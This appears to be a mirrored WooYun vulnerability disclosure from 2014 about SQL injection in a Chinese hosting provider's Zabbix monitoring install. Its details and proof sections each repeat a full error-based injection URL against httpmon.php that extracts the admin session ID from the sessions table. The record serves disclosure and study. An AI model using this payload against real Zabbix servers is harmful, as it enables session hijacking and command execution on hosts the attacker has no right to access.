世纪互联ZabbixSQL注入导致命令执行

admin

140947
文章

117
评论

2015年5月2日16:28:10评论277 views字数 236阅读0分47秒阅读模式

摘要

2014-07-20：细节已通知厂商并且等待厂商处理中
2014-07-20：厂商已查看当前漏洞内容,细节仅向厂商公开
2014-07-25：厂商已经主动忽略漏洞，细节向公众公开

漏洞概要关注数(7) 关注此漏洞

缺陷编号： WooYun-2014-69144

漏洞标题：世纪互联ZabbixSQL注入导致命令执行

漏洞作者： fuckadmin

提交时间： 2014-07-20 23:38

公开时间： 2014-07-25 23:40

漏洞类型：未授权访问/权限绕过

危害等级：高

自评Rank： 20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：未授权访问

1人收藏

漏洞详情

披露状态：

简要描述：

世纪互联ZabbixSQL注入导致命令执行！可影响全网主机~
只是个小人物，求大牛别人肉~

详细说明：

直接上图吧，有图有真相！

code 区域

httpmon.php?applications=2 and (select 1 from (select count(*),concat((select(select concat(cast(concat(sessionid,0x7e,userid,0x7e,status) as char),0x7e)) from zabbix.sessions where status=0 and userid=1 LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

这负载有点高！

好多好多主机~~~

漏洞证明：

直接上图吧，有图有真相！

code 区域

httpmon.php?applications=2 and (select 1 from (select count(*),concat((select(select concat(cast(concat(sessionid,0x7e,userid,0x7e,status) as char),0x7e)) from zabbix.sessions where status=0 and userid=1 LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

这负载有点高！

好多好多主机~~~

修复方案：

1.升级吧

2.限制guest

版权声明：转载请注明来源 fuckadmin@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2014-07-25 23:40

厂商回复：

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2014-07-25 23:42 | fuckadmin ( 普通白帽子 | Rank:662 漏洞数:92 | 千里之堤溃于蚁穴)

1

该漏洞已提前通知厂商修复。

1# 回复此人

漏洞概要 关注数(7) 关注此漏洞